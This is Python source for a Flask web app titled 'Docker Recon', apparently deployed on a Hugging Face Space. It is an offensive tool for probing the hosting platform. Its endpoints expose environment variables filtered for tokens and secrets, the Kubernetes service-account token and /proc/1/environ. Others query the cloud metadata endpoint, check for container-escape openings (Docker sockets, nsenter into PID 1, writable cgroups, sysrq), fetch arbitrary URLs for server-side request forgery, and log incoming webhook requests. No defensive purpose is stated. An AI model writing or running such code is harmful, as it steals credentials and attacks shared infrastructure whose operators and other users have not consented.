Spaces:
Sleeping
Sleeping
| import os, subprocess, json, socket | |
| from flask import Flask, jsonify, request | |
| app = Flask(__name__) | |
| webhook_log = [] | |
| def index(): | |
| return "<h1>Docker Recon</h1><ul><li><a href='/env'>Env</a></li><li><a href='/meta1'>AWS Meta v1</a></li><li><a href='/ping_meta'>Ping Meta</a></li><li><a href='/k8s'>K8s</a></li><li><a href='/net'>Net</a></li><li><a href='/proc'>Proc</a></li><li><a href='/dns'>DNS</a></li><li><a href='/escape'>Escape</a></li><li><a href='/webhook_log'>Webhook Log</a></li><li><a href='/fetch?url=http://example.com'>Fetch URL</a></li></ul>" | |
| def env(): | |
| r = {} | |
| r["all_env"] = {k:v for k,v in sorted(os.environ.items()) | |
| if any(x in k.upper() for x in ["TOKEN","KEY","SECRET","AWS","HF_","SPACE_","KUBE","DOCKER","API","GOOGLE","AZURE","CRED","PASSWORD","MONGO","REDIS","DATABASE","SERVICE"])} | |
| r["all_env_keys"] = sorted(os.environ.keys()) | |
| try: | |
| with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f: | |
| r["k8s_sa_token"] = f.read()[:100] + "..." | |
| except: r["k8s_sa_token"] = "not found" | |
| try: | |
| with open("/proc/1/environ", "rb") as f: | |
| envs = f.read().decode("utf-8", errors="replace").split("\0") | |
| r["proc1_env"] = [e for e in envs if any(x in e.upper() for x in ["TOKEN","KEY","SECRET","AWS","HF_","KUBE","CRED"])] | |
| except Exception as e: r["proc1_env"] = str(e) | |
| return jsonify(r) | |
| def meta1(): | |
| r = {} | |
| try: | |
| p = subprocess.run(["curl", "-sv", "-m", "5", "http://169.254.169.254/latest/meta-data/"], | |
| capture_output=True, text=True, timeout=8) | |
| r["stdout"] = p.stdout[:1000] | |
| r["stderr"] = p.stderr[:1000] | |
| r["rc"] = p.returncode | |
| except Exception as e: r["error"] = str(e) | |
| return jsonify(r) | |
| def ping_meta(): | |
| r = {} | |
| try: | |
| p = subprocess.run(["arp", "-n"], capture_output=True, text=True, timeout=5) | |
| r["arp"] = p.stdout[:500] | |
| except: pass | |
| try: | |
| p = subprocess.run(["ip", "route", "get", "169.254.169.254"], | |
| capture_output=True, text=True, timeout=5) | |
| r["route"] = p.stdout | |
| except: pass | |
| return jsonify(r) | |
| def k8s(): | |
| r = {} | |
| k8s_host = os.environ.get("KUBERNETES_SERVICE_HOST", "") | |
| k8s_port = os.environ.get("KUBERNETES_SERVICE_PORT", "") | |
| r["k8s_env"] = {"host": k8s_host, "port": k8s_port} | |
| if k8s_host: | |
| for path in ["/version", "/healthz"]: | |
| try: | |
| cmd = ["curl", "-sv", "-m", "3", "-k", f"https://{k8s_host}:{k8s_port}{path}"] | |
| p = subprocess.run(cmd, capture_output=True, text=True, timeout=5) | |
| r[f"k8s{path}"] = {"stdout": p.stdout[:300], "stderr": p.stderr[:300], "rc": p.returncode} | |
| except Exception as e: r[f"k8s{path}"] = str(e) | |
| return jsonify(r) | |
| def net(): | |
| r = {} | |
| try: | |
| p = subprocess.run(["ip", "addr"], capture_output=True, text=True, timeout=5) | |
| r["ip_addr"] = p.stdout[:1000] | |
| except: pass | |
| try: | |
| p = subprocess.run(["ip", "route"], capture_output=True, text=True, timeout=5) | |
| r["ip_route"] = p.stdout[:500] | |
| except: pass | |
| try: | |
| with open("/etc/resolv.conf") as f: r["resolv"] = f.read() | |
| except: pass | |
| try: | |
| with open("/etc/hosts") as f: r["hosts"] = f.read() | |
| except: pass | |
| return jsonify(r) | |
| def proc(): | |
| r = {} | |
| try: | |
| p = subprocess.run(["ps", "aux"], capture_output=True, text=True, timeout=5) | |
| r["ps"] = p.stdout[:2000] | |
| except: pass | |
| try: | |
| with open("/proc/1/cgroup") as f: r["cgroup"] = f.read()[:500] | |
| except: pass | |
| try: | |
| p = subprocess.run(["cat", "/proc/1/status"], capture_output=True, text=True, timeout=5) | |
| for line in p.stdout.split("\n"): | |
| if "Cap" in line: r.setdefault("caps", []).append(line.strip()) | |
| except: pass | |
| try: | |
| p = subprocess.run(["id"], capture_output=True, text=True, timeout=5) | |
| r["id"] = p.stdout.strip() | |
| except: pass | |
| try: | |
| with open("/proc/1/status") as f: | |
| for line in f: | |
| if "Seccomp" in line: r["seccomp"] = line.strip() | |
| except: pass | |
| return jsonify(r) | |
| def dns(): | |
| r = {} | |
| for q in ["kubernetes.default.svc.cluster.local", "cas-server.xethub.hf.co"]: | |
| try: | |
| p = subprocess.run(["dig", "+short", q], capture_output=True, text=True, timeout=5) | |
| r[q] = p.stdout.strip() if p.stdout.strip() else "NXDOMAIN" | |
| except Exception as e: r[q] = str(e) | |
| return jsonify(r) | |
| def escape(): | |
| r = {} | |
| for sock in ["/var/run/docker.sock", "/run/containerd/containerd.sock", | |
| "/run/docker.sock", "/var/run/containerd/containerd.sock"]: | |
| r[f"socket_{sock}"] = os.path.exists(sock) | |
| try: | |
| with open("/proc/mounts") as f: | |
| for line in f: | |
| if "overlay" in line and "upperdir" in line: | |
| parts = line.split(",") | |
| for p in parts: | |
| if p.startswith("upperdir="): | |
| upperdir = p.split("=")[1] | |
| r["overlay_upperdir"] = upperdir | |
| parent = os.path.dirname(os.path.dirname(upperdir)) | |
| try: | |
| r["overlay_siblings"] = os.listdir(parent)[:20] | |
| except Exception as e: | |
| r["overlay_siblings"] = str(e) | |
| except Exception as e: r["overlay_error"] = str(e) | |
| try: | |
| with open("/proc/1/root/etc/hostname") as f: | |
| r["host_hostname"] = f.read().strip() | |
| except Exception as e: r["host_hostname"] = str(e) | |
| try: | |
| r["sysrq_writable"] = os.access("/proc/sysrq-trigger", os.W_OK) | |
| except: r["sysrq_writable"] = False | |
| try: | |
| cg_root = "/sys/fs/cgroup" | |
| if os.path.isdir(cg_root): | |
| r["cgroup_root"] = os.listdir(cg_root)[:20] | |
| r["cgroup_writable"] = os.access(cg_root, os.W_OK) | |
| except Exception as e: r["cgroup_error"] = str(e) | |
| try: | |
| with open("/proc/1/status") as f: | |
| for line in f: | |
| if "Seccomp" in line: | |
| r["seccomp"] = line.strip() | |
| except: pass | |
| try: | |
| r["dev_listing"] = os.listdir("/dev")[:30] | |
| except: pass | |
| try: | |
| p = subprocess.run(["nsenter", "--target", "1", "--mount", "--", "hostname"], | |
| capture_output=True, text=True, timeout=5) | |
| r["nsenter"] = {"stdout": p.stdout, "stderr": p.stderr, "rc": p.returncode} | |
| except Exception as e: r["nsenter"] = str(e) | |
| try: | |
| r["namespaces"] = {} | |
| for ns in os.listdir("/proc/1/ns"): | |
| r["namespaces"][ns] = os.readlink(f"/proc/1/ns/{ns}") | |
| except Exception as e: r["ns_error"] = str(e) | |
| return jsonify(r) | |
| def webhook(): | |
| entry = { | |
| "method": request.method, | |
| "headers": dict(request.headers), | |
| "body": request.get_data(as_text=True)[:5000], | |
| "args": dict(request.args), | |
| "remote_addr": request.remote_addr, | |
| } | |
| webhook_log.append(entry) | |
| while len(webhook_log) > 10: | |
| webhook_log.pop(0) | |
| return jsonify({"status": "ok"}) | |
| def get_webhook_log(): | |
| return jsonify(webhook_log) | |
| def fetch(): | |
| url = request.args.get("url", "http://example.com") | |
| r = {} | |
| try: | |
| p = subprocess.run(["curl", "-sv", "-m", "5", url], | |
| capture_output=True, text=True, timeout=8) | |
| r["stdout"] = p.stdout[:2000] | |
| r["stderr"] = p.stderr[:1000] | |
| r["rc"] = p.returncode | |
| except Exception as e: r["error"] = str(e) | |
| return jsonify(r) | |
| if __name__ == "__main__": | |
| app.run(host="0.0.0.0", port=7860) | |